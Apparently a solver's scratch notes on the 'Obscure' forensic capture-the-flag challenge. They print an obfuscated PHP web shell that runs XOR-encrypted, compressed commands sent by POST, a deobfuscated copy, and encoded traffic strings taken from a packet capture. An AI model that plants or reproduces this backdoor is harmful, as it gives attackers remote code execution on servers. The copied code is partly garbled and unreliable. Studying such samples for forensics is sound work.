Obscure (Forensic Challenge)

Untitled

<?php

V='

$k="80e32263";

$kh="6f8af44abea0";

$kf="351039f4a7b5";

$p="0UlYyJHG87EJqEz6";

function x($'; $P='++){
$o.=
$t{$i}^
$k{$j};}}return $o;}

if(@preg_match("/$kh(.+)$kf/",@file_get_contents(';$d='t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i';
$B='ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}';

$N=str_replace('','','create_function');
$c='"php://input"),$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@;
$u=str_replace('','',$V.$d.$P.$c.$B);
$x=$N('',$;$x();
?>

Untitled

0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5

3Qve>.IXeOLC>[D&6f8af44abea0QKwu/Xr7GuFo50p4HuAZHBfnqhv7/+ccFfisfH4bYOSMRi0eGPgZuRd6SPsdGP//c+dVM7gnYSWvlINZmlWQGyDpzCowpzczRely/Q351039f4a7b5+'Qn/?>-
e=ZU mx

<?php
$k="80e32263";
$kh="6f8af44abea0";
$kf="351039f4a7b5";
$p="0UlYyJHG87EJqEz6";
function x($t, $k){
$o.=
$t{$i}^
$k{$j};}}return $o;}

if(@preg_match("/$kh(.+)$kf/",@file_get_contents(';$d='t,$k){

$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i';

$B='ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}';

$N=str_replace('','','create_function');
$c='"php://input"),$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@;
$u=str_replace('','',$V.$d.$P.$c.$B);
$x=$N('',$;$x();
?>

[<https://www.unphp.net/decode/18ee9b97840e48dd5ece5c231e8fcc0d/>](<https://www.unphp.net/decode/18ee9b97840e48dd5ece5c231e8fcc0d/>)

<?php
**function
x**
($t, $k) {
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
**for**
($i = 0;$i < $l;) {
**for**
($j = 0;($j < $c && $i < $l);$j++, $i++) {
            $o.= $t{$i} ^ $k{$j};
        }
    }
    **return**
    o;
}
$k = "80e32263";
$kh = "6f8af44abea0";
$kf = "351039f4a7b5";
$p = "0UlYyJHG87EJqEz6";

**function
x**
($t, $k) {
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    
**for**
$i = 0;$i < $l;) {

**for**
($j = 0;($j < $c && $i < $l);$j++, $i++) {
            $o.= $t{$i} ^ $k{$j};
        }
    }
    
**return**

$o;
}
**if**
(@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 1) {
    @ob_start();
**eval**

(@gzuncompress(@x(base64_decode($m[1]), $k)));
    $o = @ob_get_contents();
    @ob_end_clean();
    $r = @base64_encode(@x(@gzcompress($o), $k));
    
p**rint**
("$p$kh$r$kf");
}

Untitled

uncode the php, the base64, XOR, GZuncompress

Untitled

decode the string in tcpstream1

Untitled

wireshark posts

Untitled

"3Qve>.IXeOLC>[D&6f8af44abea0QKwu/Xr7GuFo50p4HuAZHBfnqhv7/+ccFfisfH4bYOSMRi0eGPgZuRd6SPsdGP//c+dVM7gnYSWvlINZmlWQGyDpzCowpzczRely/Q351039f4a7b5+'Qn/?>-e=ZU mx"

"3Qve>.IXeOLC>[D&6f8af44abea0QKxo+HM4thMoMKWcSng9UZNbdc4WFhO2jaU4eMhPaDTePEuB48JstWIb4aEirLpXpdgb7g8Bx/IGI/JLbVRcFack+r90YxXpmBA1wQKaU9jeRhvp7imF351039f4a7b5+'Qn/?>-e=ZU mx"

"3Qve>.IXeOLC>[D&6f8af44abea0QKxI+Ak49hMoNaXoypsATiJfd3clJ+KmL5OyfLiGNSBKHFWppDXbjhH/M9orZ0qPjQ14MLA5CjeLxAG9/fBJgQyWrbiZPrCFcj3xDb95CvC29r/AN2ziEh0351039f4a7b5+'Qn/?>-e=ZU mx"